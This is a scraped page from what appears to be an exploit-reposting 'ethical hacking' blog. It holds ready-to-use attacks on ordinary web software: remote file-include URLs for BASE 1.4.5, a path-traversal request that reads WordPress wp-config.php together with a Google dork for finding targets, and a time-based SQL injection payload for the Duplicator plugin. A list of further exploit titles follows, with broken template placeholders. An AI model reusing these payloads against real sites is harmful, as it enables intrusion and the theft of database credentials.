source: https://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/base_stat_iplink.php?BASE_path=[EV!L]
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863135861
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/base_stat_ports.php?BASE_path=[EV!L]
# Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability
# Date: April 11, 2015
# Exploit Author: @LookHin (Khwanchai Kaewyos)
# Google Dork: inurl:?fdx_switcher=mobile
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip
# Version: WP Mobile Edition Version 2.2.7
- Overview:
Wordpress Plugin 'WP Mobile Edition' is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php'
- Search on Google
inurl:?fdx_switcher=mobile
- POC
Exploit view source code wp-config.php
http://[server]/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
######################
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
# Date : 2015-04-08
# Tested on : Linux / Mozilla Firefox
######################
# Description
Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
Location file: /view/actions.php
This is the bugged ajax functions wp_ajax_duplicator_package_delete:
function duplicator_package_delete() {
DUP_Util::CheckPermissions('export');
try {
global $wpdb;
$json = array();
$post = stripslashes_deep($_POST);
$tblName = $wpdb->prefix . 'duplicator_packages';
$postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;
$list = explode(",", $postIDs);
$delCount = 0;
if ($postIDs != null) {
foreach ($list as $id) {
$getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
if ($getResult) {
$row = $getResult[0];
$nameHash = "{$row['name']}_{$row['hash']}";
$delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
if ($delResult != 0) {
$post['duplicator_delid'] variable is not sanitized
A authorized user with "export" permission or a remote unauthenticated attacker could
use this vulnerability to execute arbitrary SQL queries on the victim
WordPress web site by enticing an authenticated admin (CSRF)
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete
POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)
######################
# Vulnerability Disclosure Timeline:
2015-04-08: Discovered vulnerability
2015-04-08: Vendor Notification
2015-04-09: Vendor Response/Feedback
2015-04-10: Vendor Send Fix/Patch
2015-04-10: Public Disclosure
#######################
Discovered By : Claudio Viviani
http://www.homelab.it
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################

Traidnt Up 3.0 - SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Apple Mac OSX < 10.9/10 - Local Privilege Escalation
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

ProFTPd 1.3.5 - File Copy
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

ProWiki - 'id' Cross-Site Scripting
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

STHS v2 Web Portal - 'prospect.php?team' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

EditWrxLite CMS - 'wrx.cgi' Remote Command Execution
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Samba < 3.6.2 (x86) - Denial of Service (PoC)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Adobe Flash Player - casi32 Integer Overflow (Metasploit)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Apple Mac OSX - 'Rootpipe' Local Privilege Escalation (Metasploit)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Abrt (Fedora 21) - Race Condition
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WordPress Plugin Video Gallery 2.8 - SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

STHS v2 Web Portal - 'prospects.php?team' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

STHS v2 Web Portal - 'team.php?team' SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view